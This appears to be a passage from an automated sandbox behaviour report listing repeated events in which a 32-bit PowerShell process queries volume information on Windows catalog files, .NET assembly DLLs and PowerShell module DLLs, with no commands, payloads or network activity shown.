                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
